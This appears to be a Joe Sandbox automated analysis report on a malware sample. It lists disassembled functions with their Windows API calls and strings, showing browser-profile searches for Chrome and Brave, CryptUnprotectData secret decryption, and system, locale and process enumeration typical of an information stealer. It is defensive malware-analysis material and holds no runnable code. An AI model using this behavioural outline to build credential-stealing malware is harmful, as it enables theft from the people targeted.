Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6C1F35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C27F688,00001000), ref: 6C1F35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C1F35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C1F35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C1F363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C1F369F
__aulldiv.LIBCMT ref: 6C1F36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C1F3773
EnterCriticalSection.KERNEL32(6C27F688), ref: 6C1F377E
LeaveCriticalSection.KERNEL32(6C27F688), ref: 6C1F37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C1F37C4
EnterCriticalSection.KERNEL32(6C27F688), ref: 6C1F37CB
LeaveCriticalSection.KERNEL32(6C27F688), ref: 6C1F3801
__aulldiv.LIBCMT ref: 6C1F3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C1F3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C1F3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C1F394C

Strings

AuthcAMDenti, xrefs: 6C1F3946
QPC, xrefs: 6C1F38FC
GenuntelineI, xrefs: 6C1F3639
GTC, xrefs: 6C1F3912
MOZ_TIMESTAMP_MODE, xrefs: 6C1F35DB

Memory Dump Source

Source File: 0000000A.00000002.1716177431.000000006C1F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 6C1F0000, based on PE: true

Associated: 0000000A.00000002.1716123546.000000006C1F0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716499748.000000006C27E000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716526775.000000006C282000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c1f0000_u48o.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 802002ac31a21977ce96fb24dc520515005916428c3677c9f1a4dcb116926394
Instruction ID: 07acd1192a5535babc1cbdba94297866f5987b84758b014b325702bf9fde7978
Opcode Fuzzy Hash: 802002ac31a21977ce96fb24dc520515005916428c3677c9f1a4dcb116926394
Instruction Fuzzy Hash: 18B1D471B093209FDB09DF29C48865A77F5FB89704F05892DECA9D7790D7349902CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\*, xrefs: 0041257D
%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNELBASE(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 492filethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
SetThreadLocale.KERNEL32 ref: 00401AC2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstLocaleNextThreadlstrlen
String ID: \*.*
API String ID: 1950708506-1173974218
Opcode ID: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04086460,00000000,?,0041D758,00000000,?,00000000,00000000,?,04086E98,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,04083DF0), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,04086820), ref: 004072FB
lstrcat.KERNEL32(?,04086838), ref: 0040730F
lstrcat.KERNEL32(?,04086700), ref: 00407322
lstrcat.KERNEL32(?,04086850), ref: 00407336
lstrcat.KERNEL32(?,040870B0), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,04086820), ref: 00407399
lstrcat.KERNEL32(?,04086838), ref: 004073AD
lstrcat.KERNEL32(?,04086700), ref: 004073C1
lstrcat.KERNEL32(?,04086850), ref: 004073D4
lstrcat.KERNEL32(?,04087118), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,04086820), ref: 00407438
lstrcat.KERNEL32(?,04086838), ref: 0040744B
lstrcat.KERNEL32(?,04086700), ref: 0040745F
lstrcat.KERNEL32(?,04086850), ref: 00407473
lstrcat.KERNEL32(?,04087180), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,04086820), ref: 004074D6
lstrcat.KERNEL32(?,04086838), ref: 004074EA
lstrcat.KERNEL32(?,04086700), ref: 004074FD
lstrcat.KERNEL32(?,04086850), ref: 00407511
lstrcat.KERNEL32(?,040871E8), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,04086820), ref: 00407574
lstrcat.KERNEL32(?,04086838), ref: 00407588
lstrcat.KERNEL32(?,04086700), ref: 0040759C
lstrcat.KERNEL32(?,04086850), ref: 004075AF
lstrcat.KERNEL32(?,04087250), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,04086820), ref: 00407613
lstrcat.KERNEL32(?,04086838), ref: 00407626
lstrcat.KERNEL32(?,04086700), ref: 0040763A
lstrcat.KERNEL32(?,04086850), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,04083B88), ref: 004077DB
lstrcat.KERNEL32(?,04086A58), ref: 004077EE
lstrlen.KERNEL32(36BF7020), ref: 004077FB
lstrlen.KERNEL32(36BF7020), ref: 0040780B

